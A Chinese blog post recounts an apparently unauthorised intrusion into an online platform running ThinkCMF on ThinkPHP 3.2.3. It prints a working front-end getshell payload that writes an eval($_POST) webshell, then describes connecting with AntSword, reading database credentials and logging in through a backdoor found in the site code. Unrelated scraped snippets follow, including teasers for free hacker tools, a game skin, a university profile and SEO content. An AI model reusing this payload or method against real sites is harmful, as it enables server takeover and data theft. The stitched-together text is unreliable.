记一次对某网D平台的渗透,以及发现其后台源码存在后门的过程
拿到其ip之后先信息搜集搜了了一波,确定目标使用的是ThinkCMF。
进去之后在url处构造报错
查看到ThinkPHP版本崴3.2.3,那么对应的thinkCMF版本应该存在前台getshell的洞。废话不多说,直接构造payload一发入魂。
?a=fetch&templateFile=public/index&prefix=''&content=<php>file_put_contents('shell.php','<?php @eval($_POST[" *** *** 521"]);?>')</php>
写入shell之后连接蚁剑,直接拿下
鄙人在渗透的过程中一直有一个习惯,那就是无论如何都要拿到后台管理员权限,不拿后台权限就浑身不得劲,即使拿下了主机,也是吃嘛嘛不香。没拿到后台就拿下主机,那和没确定关系就 *** 有什么区别!
一开始的思路是读取其config.php文件连接他的数据库,在拿到了数据库账号和密码的时候怎么连也连不上去,小伙伴提供了另一条思路,修改后台登录逻辑,直捣黄龙。
正在我要修改后台登录逻辑的时,浏览代码的过程中无意之中发现了一个好玩的线索。
这。。。这TM。。。有人在代码里下毒。
拿着不知道是哪位好心人留下的后门,含泪登录了后台。
帮这个主机免费做了一次入侵检测,没有发现我们进入之前被入侵的痕迹,盲猜可能是这个平台自带后门。
一、黑客网站免费盗(在黑客网站怎么联系对方)方法总结 1、请问如何找到黑客软件免费的?1月8号任务,请大家发表~~主题:2005最新整理的黑客工具百宝箱下载想做黑客的就来看看~内容:啊拉QQ大盗黑客...
阴阳师清姬典藏皮肤化烟什么时候上架?阴阳师手游近日曝光了清姬的典藏皮肤化烟,这款皮肤是首届百绘罗衣的获奖作品,目前已经确定了价格(108魂玉,首周88魂玉),那么清姬化烟皮肤什么时候出呢?一起来看看吧...
青岛科技大学怎么样(2020青岛科技本科录用详细信息剖析)一、学校介绍青岛科技高校,坐落于青岛,所在位置优异,是山东内一所关键本科大学,院校创立于1950年,是一因此轻工行业为主导的学校,伴随着这...
有别于政府部门或机关事业单位,针对众多中小型企业而言,制作企业官网的目地非常简单。是宣传策划展现企业以提高企业形象,或是宣传策划展现商品以輔助营销推广。也就是说,建立网站的目地是根据网址协助企业提...
都说网站优化、网站优化,既然是网站优化,那么最基础的就是从网页的代码开始,传统的html满足不了移动端的需求和PC端的效果,所以html5和CSS3出来了,不但满足了更多的需求,还给我们的优化带来了很...
微信如今已经离不开我们的生活,通过微信我们可以与家人,...